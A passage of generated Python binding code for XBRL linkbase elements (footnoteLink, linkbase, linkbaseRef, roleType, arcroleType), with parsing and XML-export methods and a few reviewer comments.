        """Capture all attributes not consumed elsewhere into anyAttributes_."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed child element into the matching member list.

        <title>/<documentation> resolve a concrete class from their xsi:type
        (or plain 'type') attribute and raise NotImplementedError when none
        is present; other tags use fixed implementation classes.
        """
        if nodeName_ == 'title':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <title> element')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <documentation> element')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        # NOTE(review): an unreachable duplicate `elif nodeName_ ==
        # 'documentation'` branch emitted by the generator was removed here.
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.loc.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'referenceArc':
            # Arc class may be substituted via xsi:type.
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.referenceArc.append(obj_)
            obj_.original_tagname_ = 'referenceArc'
        elif nodeName_ == 'reference':
            obj_ = reference.factory()
            obj_.build(child_)
            self.reference.append(obj_)
            obj_.original_tagname_ = 'reference'
# end class referenceLink
class footnoteLink(GeneratedsSuper):
    """footnote extended link element definition"""
    subclass = None
    superclass = None
    def __init__(self, title=None, documentation=None, loc=None, footnoteArc=None, footnote=None):
        self.original_tagname_ = None
        # Child-element collections; a fresh list is created per instance
        # when the caller passes None (avoids shared mutable defaults).
        self.title = [] if title is None else title
        self.documentation = [] if documentation is None else documentation
        self.loc = [] if loc is None else loc
        self.footnoteArc = [] if footnoteArc is None else footnoteArc
        self.footnote = [] if footnote is None else footnote
        # Wildcard (anyAttribute) attributes captured from the source doc.
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        # Honor a registered subclass override, if any.
        if footnoteLink.subclass:
            return footnoteLink.subclass(*args_, **kwargs_)
        else:
            return footnoteLink(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_loc(self): return self.loc
    def set_loc(self, loc): self.loc = loc
    def add_loc(self, value): self.loc.append(value)
    def insert_loc_at(self, index, value): self.loc.insert(index, value)
    def replace_loc_at(self, index, value): self.loc[index] = value
    def get_footnoteArc(self): return self.footnoteArc
    def set_footnoteArc(self, footnoteArc): self.footnoteArc = footnoteArc
    def add_footnoteArc(self, value): self.footnoteArc.append(value)
    def insert_footnoteArc_at(self, index, value): self.footnoteArc.insert(index, value)
    def replace_footnoteArc_at(self, index, value): self.footnoteArc[index] = value
    def get_footnote(self): return self.footnote
    def set_footnote(self, footnote): self.footnote = footnote
    def add_footnote(self, value): self.footnote.append(value)
    def insert_footnote_at(self, index, value): self.footnote.insert(index, value)
    def replace_footnote_at(self, index, value): self.footnote[index] = value
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # True when at least one child element must be serialized.
        return bool(
            self.title or
            self.documentation or
            self.loc or
            self.footnoteArc or
            self.footnote
        )
    def export(self, outfile, level, namespace_='finassist:', name_='footnoteLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Write this element (tag, attributes, children) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Preserve the tag name this object was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='footnoteLink')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='footnoteLink', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: self-closing form.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='footnoteLink'):
        """Write wildcard (anyAttribute) attributes collected during parse."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # Clark-notation xsi attribute: re-serialize with 'xsi:' prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): this emits purely numeric namespace
                            # prefixes (e.g. xmlns:1="..."), which are not valid
                            # XML NCNames -- kept as-is for compatibility with
                            # the generator's output; confirm before changing.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='footnoteLink', fromsubclass_=False, pretty_print=True):
        """Serialize every child element of this footnoteLink to outfile."""
        eol_ = '\n' if pretty_print else ''
        for title_ in self.title:
            title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for loc_ in self.loc:
            loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
        for footnoteArc_ in self.footnoteArc:
            footnoteArc_.export(outfile, level, namespace_='link:', name_='footnoteArc', pretty_print=pretty_print)
        for footnote_ in self.footnote:
            footnote_.export(outfile, level, namespace_='link:', name_='footnote', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree/lxml node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Capture all attributes not consumed elsewhere into anyAttributes_."""
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed child element into the matching member list.

        <title>/<documentation> resolve a concrete class from their xsi:type
        (or plain 'type') attribute and raise NotImplementedError when none
        is present; other tags use fixed implementation classes.
        """
        if nodeName_ == 'title':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <title> element')
            self.title.append(obj_)
            obj_.original_tagname_ = 'title'
        elif nodeName_ == 'documentation':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <documentation> element')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        # NOTE(review): an unreachable duplicate `elif nodeName_ ==
        # 'documentation'` branch emitted by the generator was removed here.
        elif nodeName_ == 'loc':
            obj_ = locatorType.factory()
            obj_.build(child_)
            self.loc.append(obj_)
            obj_.original_tagname_ = 'loc'
        elif nodeName_ == 'footnoteArc':
            # Arc class may be substituted via xsi:type.
            class_obj_ = self.get_class_obj_(child_, arcType)
            obj_ = class_obj_.factory()
            obj_.build(child_)
            self.footnoteArc.append(obj_)
            obj_.original_tagname_ = 'footnoteArc'
        elif nodeName_ == 'footnote':
            obj_ = footnote.factory()
            obj_.build(child_)
            self.footnote.append(obj_)
            obj_.original_tagname_ = 'footnote'
# end class footnoteLink
class linkbase(GeneratedsSuper):
    """Definition of the linkbase element. Used to contain a set of zero or
    more extended link elements."""
    subclass = None
    superclass = None
    def __init__(self, id=None, documentation=None, roleRef=None, arcroleRef=None, extended=None):
        self.original_tagname_ = None
        self.id = _cast(None, id)
        # Child-element collections; a fresh list is created per instance
        # when the caller passes None (avoids shared mutable defaults).
        self.documentation = [] if documentation is None else documentation
        self.roleRef = [] if roleRef is None else roleRef
        self.arcroleRef = [] if arcroleRef is None else arcroleRef
        self.extended = [] if extended is None else extended
        # Wildcard (anyAttribute) attributes captured from the source doc.
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        # Honor a registered subclass override, if any.
        if linkbase.subclass:
            return linkbase.subclass(*args_, **kwargs_)
        else:
            return linkbase(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_roleRef(self): return self.roleRef
    def set_roleRef(self, roleRef): self.roleRef = roleRef
    def add_roleRef(self, value): self.roleRef.append(value)
    def insert_roleRef_at(self, index, value): self.roleRef.insert(index, value)
    def replace_roleRef_at(self, index, value): self.roleRef[index] = value
    def get_arcroleRef(self): return self.arcroleRef
    def set_arcroleRef(self, arcroleRef): self.arcroleRef = arcroleRef
    def add_arcroleRef(self, value): self.arcroleRef.append(value)
    def insert_arcroleRef_at(self, index, value): self.arcroleRef.insert(index, value)
    def replace_arcroleRef_at(self, index, value): self.arcroleRef[index] = value
    def get_extended(self): return self.extended
    def set_extended(self, extended): self.extended = extended
    def add_extended(self, value): self.extended.append(value)
    def insert_extended_at(self, index, value): self.extended.insert(index, value)
    def replace_extended_at(self, index, value): self.extended[index] = value
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # True when at least one child element must be serialized.
        return bool(
            self.documentation or
            self.roleRef or
            self.arcroleRef or
            self.extended
        )
    def export(self, outfile, level, namespace_='finassist:', name_='linkbase', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Write this element (tag, attributes, children) to outfile."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Preserve the tag name this object was parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='linkbase')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='linkbase', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: self-closing form.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='linkbase'):
        """Write the declared 'id' attribute plus any wildcard attributes."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # Clark-notation xsi attribute: re-serialize with 'xsi:' prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            # NOTE(review): this emits purely numeric namespace
                            # prefixes (e.g. xmlns:1="..."), which are not valid
                            # XML NCNames -- kept as-is for compatibility with
                            # the generator's output; confirm before changing.
                            unique_counter += 1
                            outfile.write(' xmlns:%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' %d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='linkbase', fromsubclass_=False, pretty_print=True):
        """Serialize every child element of this linkbase to outfile."""
        eol_ = '\n' if pretty_print else ''
        for documentation_ in self.documentation:
            documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
        for roleRef_ in self.roleRef:
            roleRef_.export(outfile, level, namespace_='link:', name_='roleRef', pretty_print=pretty_print)
        for arcroleRef_ in self.arcroleRef:
            arcroleRef_.export(outfile, level, namespace_='link:', name_='arcroleRef', pretty_print=pretty_print)
        for extended_ in self.extended:
            extended_.export(outfile, level, namespace_, name_='extended', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree/lxml node; returns self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read the declared 'id' attribute, then collect the wildcard rest."""
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed child element into the matching member list.

        <documentation> and the abstract <extended> head resolve a concrete
        class from their xsi:type (or plain 'type') attribute; the concrete
        substitution-group members (presentationLink, definitionLink, ...)
        all accumulate into self.extended.
        """
        if nodeName_ == 'documentation':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <documentation> element')
            self.documentation.append(obj_)
            obj_.original_tagname_ = 'documentation'
        # NOTE(review): an unreachable duplicate `elif nodeName_ ==
        # 'documentation'` branch emitted by the generator was removed here.
        elif nodeName_ == 'roleRef':
            obj_ = roleRef.factory()
            obj_.build(child_)
            self.roleRef.append(obj_)
            obj_.original_tagname_ = 'roleRef'
        elif nodeName_ == 'arcroleRef':
            obj_ = arcroleRef.factory()
            obj_.build(child_)
            self.arcroleRef.append(obj_)
            obj_.original_tagname_ = 'arcroleRef'
        elif nodeName_ == 'extended':
            type_name_ = child_.attrib.get(
                '{http://www.w3.org/2001/XMLSchema-instance}type')
            if type_name_ is None:
                type_name_ = child_.attrib.get('type')
            if type_name_ is not None:
                type_names_ = type_name_.split(':')
                if len(type_names_) == 1:
                    type_name_ = type_names_[0]
                else:
                    type_name_ = type_names_[1]
                class_ = globals()[type_name_]
                obj_ = class_.factory()
                obj_.build(child_)
            else:
                raise NotImplementedError(
                    'Class not implemented for <extended> element')
            self.extended.append(obj_)
            obj_.original_tagname_ = 'extended'
        elif nodeName_ == 'presentationLink':
            obj_ = presentationLink.factory()
            obj_.build(child_)
            self.extended.append(obj_)
            obj_.original_tagname_ = 'presentationLink'
        elif nodeName_ == 'definitionLink':
            obj_ = definitionLink.factory()
            obj_.build(child_)
            self.extended.append(obj_)
            obj_.original_tagname_ = 'definitionLink'
        elif nodeName_ == 'calculationLink':
            obj_ = calculationLink.factory()
            obj_.build(child_)
            self.extended.append(obj_)
            obj_.original_tagname_ = 'calculationLink'
        elif nodeName_ == 'labelLink':
            obj_ = labelLink.factory()
            obj_.build(child_)
            self.extended.append(obj_)
            obj_.original_tagname_ = 'labelLink'
        elif nodeName_ == 'referenceLink':
            obj_ = referenceLink.factory()
            obj_.build(child_)
            self.extended.append(obj_)
            obj_.original_tagname_ = 'referenceLink'
        elif nodeName_ == 'footnoteLink':
            obj_ = footnoteLink.factory()
            obj_.build(child_)
            self.extended.append(obj_)
            obj_.original_tagname_ = 'footnoteLink'
# end class linkbase
class linkbaseRef(GeneratedsSuper):
    """Definition of the linkbaseRef element - used to link to XBRL
    taxonomy extended links from taxonomy schema documents and from
    XBRL instances. This attribute must have the value:
    http://www.w3.org/1999/xlink/properties/linkbase"""
    subclass = None
    superclass = None
    def __init__(self, arcrole=None):
        self.original_tagname_ = None
        self.arcrole = _cast(None, arcrole)
        # Wildcard (xs:anyAttribute) attributes captured during parsing.
        self.anyAttributes_ = {}
    def factory(*args_, **kwargs_):
        if linkbaseRef.subclass:
            return linkbaseRef.subclass(*args_, **kwargs_)
        else:
            return linkbaseRef(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_arcrole(self): return self.arcrole
    def set_arcrole(self, arcrole): self.arcrole = arcrole
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
    def hasContent_(self):
        # linkbaseRef declares no child elements or text content, so it is
        # always serialized as an empty element.
        return False
    def export(self, outfile, level, namespace_='finassist:', name_='linkbaseRef', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to ``outfile`` as XML at ``level`` indent."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='linkbaseRef')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='linkbaseRef', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='linkbaseRef'):
        """Write declared and wildcard attributes for this element."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
                        if namespace == 'http://www.w3.org/XML/1998/namespace':
                            outfile.write(' %s=%s' % (
                                name, quote_attrib(value), ))
                        else:
                            unique_counter += 1
                            # XML NCNames must not begin with a digit, so the
                            # generated namespace prefix is 'ns<N>'; the bare
                            # counter previously emitted non-well-formed XML
                            # such as xmlns:1="...".
                            outfile.write(' xmlns:ns%d="%s"' % (
                                unique_counter, namespace, ))
                            outfile.write(' ns%d:%s=%s' % (
                                unique_counter, name, quote_attrib(value), ))
                else:
                    if name not in already_processed:
                        already_processed.add(name)
                        outfile.write(' %s=%s' % (
                            name, quote_attrib(value), ))
        if self.arcrole is not None and 'arcrole' not in already_processed:
            already_processed.add('arcrole')
            outfile.write(' arcrole=%s' % (self.gds_format_string(quote_attrib(self.arcrole).encode(ExternalEncoding), input_name='arcrole'), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='linkbaseRef', fromsubclass_=False, pretty_print=True):
        # No child elements are defined for linkbaseRef.
        pass
    def build(self, node):
        """Populate this object from an element-tree ``node``; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('arcrole', node)
        if value is not None and 'arcrole' not in already_processed:
            already_processed.add('arcrole')
            self.arcrole = value
        # All remaining attributes fall into the wildcard mapping.
        self.anyAttributes_ = {}
        for name, value in attrs.items():
            if name not in already_processed:
                self.anyAttributes_[name] = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # No child elements are defined for linkbaseRef.
        pass
# end class linkbaseRef
class roleType(GeneratedsSuper):
    """The roleType element definition - used to define custom role values
    in XBRL extended links."""
    subclass = None
    superclass = None
    def __init__(self, roleURI=None, id=None, definition=None, usedOn=None):
        self.original_tagname_ = None
        self.roleURI = _cast(None, roleURI)
        self.id = _cast(None, id)
        self.definition = definition
        # usedOn is a repeatable child element; default to a fresh list.
        self.usedOn = [] if usedOn is None else usedOn
    @staticmethod
    def factory(*args_, **kwargs_):
        cls = roleType.subclass or roleType
        return cls(*args_, **kwargs_)
    def get_definition(self):
        return self.definition
    def set_definition(self, definition):
        self.definition = definition
    def get_usedOn(self):
        return self.usedOn
    def set_usedOn(self, usedOn):
        self.usedOn = usedOn
    def add_usedOn(self, value):
        self.usedOn.append(value)
    def insert_usedOn_at(self, index, value):
        self.usedOn.insert(index, value)
    def replace_usedOn_at(self, index, value):
        self.usedOn[index] = value
    def get_roleURI(self):
        return self.roleURI
    def set_roleURI(self, roleURI):
        self.roleURI = roleURI
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def hasContent_(self):
        # True when at least one child element would be serialized.
        return self.definition is not None or bool(self.usedOn)
    def export(self, outfile, level, namespace_='finassist:', name_='roleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='roleType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='roleType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='roleType'):
        """Write roleURI and id attributes when present."""
        for attr_name, attr_value in (('roleURI', self.roleURI), ('id', self.id)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='roleType', fromsubclass_=False, pretty_print=True):
        """Write the optional definition followed by each usedOn child."""
        eol_ = '\n' if pretty_print else ''
        if self.definition is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sdefinition>%s</%sdefinition>%s' % (namespace_, self.gds_format_string(quote_xml(self.definition).encode(ExternalEncoding), input_name='definition'), namespace_, eol_))
        for item_ in self.usedOn:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%susedOn>%s</%susedOn>%s' % (namespace_, self.gds_format_string(quote_xml(item_).encode(ExternalEncoding), input_name='usedOn'), namespace_, eol_))
    def build(self, node):
        """Populate this object from an element-tree node; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_ = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        for attr_name in ('roleURI', 'id'):
            value = find_attr_value_(attr_name, node)
            if value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                setattr(self, attr_name, value)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'definition':
            self.definition = self.gds_validate_string(child_.text, node, 'definition')
        elif nodeName_ == 'usedOn':
            self.usedOn.append(self.gds_validate_string(child_.text, node, 'usedOn'))
# end class roleType
class arcroleType(GeneratedsSuper):
    """The arcroleType element definition - used to define custom arc role
    values in XBRL extended links."""
    subclass = None
    superclass = None
    def __init__(self, arcroleURI=None, id=None, cyclesAllowed=None, definition=None, usedOn=None):
        self.original_tagname_ = None
        self.arcroleURI = _cast(None, arcroleURI)
        self.id = _cast(None, id)
        self.cyclesAllowed = _cast(None, cyclesAllowed)
        self.definition = definition
        # usedOn is a repeatable child element; default to a fresh list.
        self.usedOn = [] if usedOn is None else usedOn
    @staticmethod
    def factory(*args_, **kwargs_):
        cls = arcroleType.subclass or arcroleType
        return cls(*args_, **kwargs_)
    def get_definition(self):
        return self.definition
    def set_definition(self, definition):
        self.definition = definition
    def get_usedOn(self):
        return self.usedOn
    def set_usedOn(self, usedOn):
        self.usedOn = usedOn
    def add_usedOn(self, value):
        self.usedOn.append(value)
    def insert_usedOn_at(self, index, value):
        self.usedOn.insert(index, value)
    def replace_usedOn_at(self, index, value):
        self.usedOn[index] = value
    def get_arcroleURI(self):
        return self.arcroleURI
    def set_arcroleURI(self, arcroleURI):
        self.arcroleURI = arcroleURI
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_cyclesAllowed(self):
        return self.cyclesAllowed
    def set_cyclesAllowed(self, cyclesAllowed):
        self.cyclesAllowed = cyclesAllowed
    def hasContent_(self):
        # True when at least one child element would be serialized.
        return self.definition is not None or bool(self.usedOn)
    def export(self, outfile, level, namespace_='finassist:', name_='arcroleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        """Serialize this element to outfile as XML."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='arcroleType')
        if not self.hasContent_():
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='arcroleType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='arcroleType'):
        """Write arcroleURI, id and cyclesAllowed attributes when present."""
        for attr_name, attr_value in (
                ('arcroleURI', self.arcroleURI),
                ('id', self.id),
                ('cyclesAllowed', self.cyclesAllowed)):
            if attr_value is not None and attr_name not in already_processed:
                already_processed.add(attr_name)
                outfile.write(' %s=%s' % (attr_name, quote_attrib(attr_value), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='arcroleType', fromsubclass_=False, pretty_print=True):
        """Write the optional definition followed by each usedOn child."""
        eol_ = '\n' if pretty_print else ''
        if self.definition is not None:
            showIndent(outfile, level, pretty_print)
